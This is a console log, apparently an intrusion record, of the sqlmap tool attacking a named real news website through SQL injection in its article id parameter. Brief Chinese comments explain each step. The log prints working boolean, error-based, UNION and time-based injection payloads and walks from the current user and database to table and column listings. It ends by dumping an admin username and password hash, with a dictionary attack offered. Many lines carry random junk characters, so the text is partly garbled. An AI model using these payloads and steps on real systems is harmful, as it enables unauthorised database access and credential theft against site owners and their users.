D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 ^' D, O. Y, g6 g2 l
ms "Mysql" --current-user /* 注解:获取当前用户名称- |, E/ x8 {7 \# G6 K: d
sqlmap/0.9 - automatic SQL injection and database takeover tool
9 G9 _( Z) z/ ^' | http://sqlmap.sourceforge.net starting at: 16:53:540 ^! r' r# j% [9 ]) I
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. I6 x4 B6 _1 y! \ session file7 F7 e; {3 u( R7 o: v4 `4 W4 a* t
[16:53:54] [INFO] resuming injection data from session file/ H; P: M* q2 D+ ?% T0 Q2 r- W# e
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file4 m! K% S, A5 u8 y1 ?% a, p" e
[16:53:54] [INFO] testing connection to the target url) B2 V2 U# g9 w& g9 ?5 _1 a; @, L
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% `$ f7 [2 c9 u1 [, b- wsts:* c0 k2 M: P# W" o1 R
---7 n1 W1 }" n, i/ E- c
Place: GET( D" t8 m, D* I% b- q
Parameter: id. R! Y# U4 l% I0 W" ?
Type: boolean-based blind0 E0 x0 f7 I9 J( [
Title: AND boolean-based blind - WHERE or HAVING clause1 C3 I& A* X: y& f, S q
Payload: id=276 AND 799=799
- @4 e, b U6 q% n J Type: error-based
( I# c: |$ n V* @2 h1 o+ T: S4 n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 J5 N* E$ b) b5 J5 t Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% ~# t' G4 f/ p7 a% v0 F
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 B7 ]" {* a1 W- n: w: ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 r- c: Q, Q6 j0 f& q Type: UNION query
( [: M. l v% X$ k Title: MySQL UNION query (NULL) - 1 to 10 columns
: L* m2 Y( W/ Q: Y$ W+ H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- |- z* f% p# G' i. _8 U
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! e8 h5 R( r. T E8 Z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 z' l% u4 u' s/ L, X Type: AND/OR time-based blind9 v* ]6 p) ^+ p' t& ]
Title: MySQL > 5.0.11 AND time-based blind# b/ R4 l7 m" |# }6 f. O3 }5 @
Payload: id=276 AND SLEEP(5)
& G j2 i. l* c/ ?---
, S7 s, M9 R; X, N) G2 l[16:53:55] [INFO] the back-end DBMS is MySQL
/ y: k$ Q' K5 l. n! t7 o2 wweb server operating system: Windows
% {5 W5 ]1 y) M" @$ A$ m! bweb application technology: Apache 2.2.11, PHP 5.3.0 R% _ }' H' C/ l
back-end DBMS: MySQL 5.0
# P1 u" G+ x- L' d8 h; o[16:53:55] [INFO] fetching current user
4 x$ H7 d5 H, i9 G% ecurrent user: 'root@localhost'
2 T! n' V- H9 O2 i1 F$ Z3 }+ Z; r[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. T1 x; c; O" e2 b* J% c; k0 n9 ttput\www.wepost.com.hk' shutting down at: 16:53:58
, _5 G; |% M% c; o# b$ ]7 r7 G. }% e! [, }
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db/ ]4 x# j$ a* f9 G0 E# k- Z i8 o
ms "Mysql" --current-db /*当前数据库
& \$ e" a' q0 G+ W4 ` z/ |8 p sqlmap/0.9 - automatic SQL injection and database takeover tool
/ h- M5 l) K- S/ Y" G0 t http://sqlmap.sourceforge.net starting at: 16:54:16
9 |/ C& s" g5 z: O9 K6 W# |. C[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, E) M* M) T! B5 j5 k+ ~
session file. g- V R$ S" S' }9 o6 W
[16:54:16] [INFO] resuming injection data from session file! q; c# H- j. N& `
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
# U" y' ~ |4 o ?[16:54:16] [INFO] testing connection to the target url
$ S4 D6 y! F+ B0 v: L+ g# Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque3 K* t0 K4 e8 ^3 |& S; ^
sts:2 g ]) }- j" M& Q5 l; B
---
- I/ Y6 m, k% Z* ~3 [Place: GET
3 O, I9 l; Q" v$ ]! QParameter: id
$ u$ G6 M# _1 H% J Type: boolean-based blind
$ V0 X9 {* {5 d Title: AND boolean-based blind - WHERE or HAVING clause8 M* n& ~6 p$ C. e7 f& G- n* [
Payload: id=276 AND 799=7992 c4 c8 B9 S: }! g. B$ ?" @1 D
Type: error-based
! |: q9 q, |' Y+ N! h- `7 T) U Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 t6 Z9 L/ ^* t$ t" B* P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ Y, H0 Q$ \4 R, E8 N: Y% X+ u; E) w
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" F* o$ F* O/ v% \),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& Y6 I% m4 D/ H5 ~: r7 d, g- P3 ~
Type: UNION query2 [7 ]; G$ ]) M# r' V
Title: MySQL UNION query (NULL) - 1 to 10 columns$ L9 D' Y0 a8 F8 l1 l0 S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 @% n- ~6 L- m R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," |6 [7 ]6 h& P [! A1 x
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 h- H& w2 p, H Type: AND/OR time-based blind% X' w4 A9 V6 L, K- V! p2 h1 o
Title: MySQL > 5.0.11 AND time-based blind, Q: g$ z0 o3 R$ s" d
Payload: id=276 AND SLEEP(5)
; A! @" h* U" ~---
- N, R7 q0 v5 E[16:54:17] [INFO] the back-end DBMS is MySQL
! [' P2 B& Y, {2 Z3 i- M* Z: jweb server operating system: Windows
$ K7 r; q1 H M3 n+ ^web application technology: Apache 2.2.11, PHP 5.3.0% g+ p2 b7 j) ]+ u8 o- ^
back-end DBMS: MySQL 5.0# v( p1 M& L# J b& f' B
[16:54:17] [INFO] fetching current database8 P1 p% B7 E) r
current database: 'wepost'1 u0 z1 u7 }+ r. s- q; P( R) H* W# W
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 `1 j; B# }/ A! @; [
tput\www.wepost.com.hk' shutting down at: 16:54:184 K7 K- P! [' O# Q$ D
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* d- O: Y. L8 P9 Sms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
; b* \. s3 H: b/ R9 I sqlmap/0.9 - automatic SQL injection and database takeover tool# U7 `; g) a; }0 R5 W
http://sqlmap.sourceforge.net starting at: 16:55:251 T7 q+ e7 n% J+ z6 e/ i" o# G
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% H4 ?4 [3 Z4 n1 F
session file
8 q$ ~5 s: f% F& e% `[16:55:25] [INFO] resuming injection data from session file
. [0 D0 v& p7 s3 t! F4 W% a[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! J; a4 ?9 ]* V/ [ X' _[16:55:25] [INFO] testing connection to the target url
% ?( c& u# B4 Gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
) O3 o( v7 C1 Q' `$ O1 gsts:% k0 |+ B& i& X2 ]9 W& O O8 I2 D( R
---7 U e w2 i* i4 C( n3 w
Place: GET
4 x/ D* X/ r, N% c& iParameter: id
1 f, h. L* {! U5 ~# z* q Type: boolean-based blind
$ X0 p& T& |8 [" m Title: AND boolean-based blind - WHERE or HAVING clause/ J- v* d6 ^& T' `7 w
Payload: id=276 AND 799=799
0 s) I7 A1 ~0 d, c& ?" j Type: error-based- O/ C" p5 E7 T% ?: ]
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ C8 B! \$ d$ f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- |" M2 y5 d# V6 }( u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 V1 \" y- s; x/ ?" f' Q% S8 W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ ]* J; @$ Q# \' O Type: UNION query
: h k3 Y1 _0 A Title: MySQL UNION query (NULL) - 1 to 10 columns
+ P* E1 m* O( L5 O+ @; K Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& P/ g9 o5 l" N7 |- C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ c* g, r5 B* DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, t* t2 @4 m5 e& @8 h
Type: AND/OR time-based blind0 K( ~, B+ y# h* e! O8 B" D$ v
Title: MySQL > 5.0.11 AND time-based blind
2 z# P: K4 A: z/ ^+ W, ] Payload: id=276 AND SLEEP(5)# X2 O6 h$ I' ~0 N$ j/ w. B
---
4 `3 |2 H. T4 Q; h+ n[16:55:26] [INFO] the back-end DBMS is MySQL
5 Q+ Z2 s7 f* ]7 ~: U% z' wweb server operating system: Windows5 |4 V0 f# B: [: C
web application technology: Apache 2.2.11, PHP 5.3.09 p( _ w2 a& E! u M2 ~
back-end DBMS: MySQL 5.0
2 |6 t7 A3 K0 D# @3 f% o' I[16:55:26] [INFO] fetching tables for database 'wepost'
7 s4 _; u& }4 i6 @2 p) E& M: {7 q[16:55:27] [INFO] the SQL query used returns 6 entries
q Y( O! X8 [- d/ sDatabase: wepost7 t9 M) r/ e8 h7 g, I+ }$ y/ h/ f: |
[6 tables]9 q9 E( i3 S& m/ z! {6 C
+-------------+* j* o# y2 X6 w5 U
| admin |+ I# `# C2 E) t9 u) @7 _6 T
| article |; ]/ ?" G) i/ F, A2 p- {
| contributor |) }6 b' g; e2 V1 j
| idea |
* S Q% `) f( s| image |
5 e( Z7 R, D5 f b! K| issue |2 { H% p( a; {7 Z" H
+-------------+( k9 Z' }7 q7 w
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: t; L. [( C" _3 U( Q5 e* _tput\www.wepost.com.hk' shutting down at: 16:55:33& d, A2 K- b, q+ b! K. z
5 \! w4 r# ^% LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! v( R R) b7 h/ p" Q3 P- y+ }
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
3 @2 v/ z& Y H' s! S6 V/ V sqlmap/0.9 - automatic SQL injection and database takeover tool: `$ s, w" Y! n0 I& G6 o+ k
http://sqlmap.sourceforge.net starting at: 16:56:060 t; w/ M% h' X% m5 [( b
sqlmap identified the following injection points with a total of 0 HTTP(s) reque- P& u" s' r3 \' ~$ @4 X7 \2 O
sts:
( z9 ~" V. i, X* m( ?---$ w; {6 L" H* X3 Q2 T |0 q
Place: GET3 m, ? Y( d! ]2 N- b" w# s8 H' c
Parameter: id
2 f: r0 W) e. X5 ^8 z2 G6 c4 n Type: boolean-based blind
' f" d2 z& U# w( l' y8 n' V Title: AND boolean-based blind - WHERE or HAVING clause
* g9 F; ^ S" o8 |! J Payload: id=276 AND 799=799
$ B: }0 a. L s" [) l% P- C! g Type: error-based: x' \8 e/ ^6 D& ]( j
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( S, ]# P" L6 G7 S& `; X& `2 \ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 u/ L3 I' L( a6 R) W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 Y& v9 b7 m( K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ X; ]5 T; O: L6 F Type: UNION query( v @3 c0 S* {9 I, d/ f! g( ]
Title: MySQL UNION query (NULL) - 1 to 10 columns% X# m- v# ]5 ^* a0 x" J2 ^! V
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: R% t" B6 w; \7 A% \: X! n$ C& N0 ](58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 z8 s& ?" b7 v/ b- t3 S& _
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 E7 y$ M0 k8 l7 J
Type: AND/OR time-based blind
0 h4 Y9 Y8 D+ b# ~$ h" f Title: MySQL > 5.0.11 AND time-based blind1 K& F8 N7 r# [! `1 H
Payload: id=276 AND SLEEP(5)
6 K" H* ?; e% E! e7 u- l4 }* R---
9 F* t1 L' [. C" ?# }: q+ _web server operating system: Windows9 X8 S+ C- a/ r: X5 A2 I7 U/ c/ r
web application technology: Apache 2.2.11, PHP 5.3.0# r; y5 b2 B D, c& P
back-end DBMS: MySQL 5.0
2 e/ H$ F5 ]7 t# X- [( `[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
; A4 h e5 ?0 `* w4 Hssion': wepost, wepost
# I" h; g1 t) Y) uDatabase: wepost `2 e: t C8 m0 d# G2 Q+ T
Table: admin m1 d' d' w. U1 A6 P
[4 columns]
# s% n3 J7 ?/ i$ C+----------+-------------+$ D& |1 C4 [" i, k5 r6 z- t# E( A
| Column | Type |
; T) h- J3 g& H; r+----------+-------------+: a6 Q" F) q3 }4 [' S; ^+ ~
| id | int(11) |9 J3 z$ [( l: a+ `+ c
| password | varchar(32) |
, H4 x' v1 I5 ]3 ^. ?| type | varchar(10) |
1 D+ d# U( B& V B7 x- V7 o" m3 `; A| userid | varchar(20) |
, H" W/ ^2 P" J: N# W+----------+-------------+
+ ]$ a9 x: W* R% v2 I6 ]. }" q8 W shutting down at: 16:56:19
$ ]' `, H( x, [4 {. }3 ~' B8 c* Y8 F) m7 g! V& G& N6 N
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 @! Y8 w; q$ A+ a$ `) dms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
# i5 O [: c* p" f( J/ Q9 R sqlmap/0.9 - automatic SQL injection and database takeover tool
. i: G3 F3 G' V A, y http://sqlmap.sourceforge.net starting at: 16:57:145 u2 J& v! u, }' }$ z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 C' e7 q5 `0 H8 y3 k; W9 [* R
sts:
- \, B# m( W, V7 A* ]- f---
' i# i* c6 [! n0 w% k/ g, mPlace: GET9 v0 U/ M, ?" k! o8 g8 |7 `
Parameter: id
, E5 g4 W6 k+ F' R1 } Type: boolean-based blind
6 h# b7 R) S. W4 o Title: AND boolean-based blind - WHERE or HAVING clause
* }, G9 ~+ a$ i. P Payload: id=276 AND 799=7992 b* p: v5 c: R8 ~/ r9 ^
Type: error-based
) [! _6 i# X+ e4 J4 ]" h$ l Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 [+ t. y+ U1 m4 S* T; o
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 R# {' T: r1 o* U# R0 ?5 V
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) m% A& J" P" B),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ O8 b3 ^ D# i6 J y9 s) s* T: z( R3 y
Type: UNION query3 X& L7 P. j+ ~
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 L! k* z# q1 r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* U& Q3 u( u. `
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: Y' M# H3 P7 v BCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 y$ m: i. N2 e4 l S& Z
Type: AND/OR time-based blind
7 Q) S+ j! r' t, X' X. D Title: MySQL > 5.0.11 AND time-based blind: E3 l- g; a9 q
Payload: id=276 AND SLEEP(5)
3 r+ B b4 Y8 C2 S( e---1 B7 F7 K* S. {2 C
web server operating system: Windows
. ~ v( m5 J3 s [( eweb application technology: Apache 2.2.11, PHP 5.3.0
8 K$ p0 a2 x" y4 P( C& ?back-end DBMS: MySQL 5.0
( A7 `( ~+ A8 N0 `$ H2 Yrecognized possible password hash values. do you want to use dictionary attack o
' o! m3 O$ d' ~/ Rn retrieved table items? [Y/n/q] y
o; G( {4 v& lwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]) t$ x+ D/ X1 q' ?3 S$ X! Z
do you want to use common password suffixes? (slow!) [y/N] y
: R/ T0 g4 R& Y$ i/ j- RDatabase: wepost2 v9 Q3 G e7 s/ E
Table: admin
) k8 B+ E, j5 t2 V" E[1 entry]
g) g8 | \& U5 [+----------------------------------+------------+
2 z" j. Q# q& ]| password | userid |5 A% l, E6 O' Y Y# p* m: n2 ~
+----------------------------------+------------+3 ]& o, d" m" X4 M0 C& d7 x
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
! R) ]- h! c3 }: h+----------------------------------+------------+. B" b1 u1 Y7 {& J0 R9 |
shutting down at: 16:58:141 _/ K4 L. ]6 u9 K' s( j6 d, W. Y
0 m6 I4 A% \, J: o/ J
D:\Python27\sqlmap> |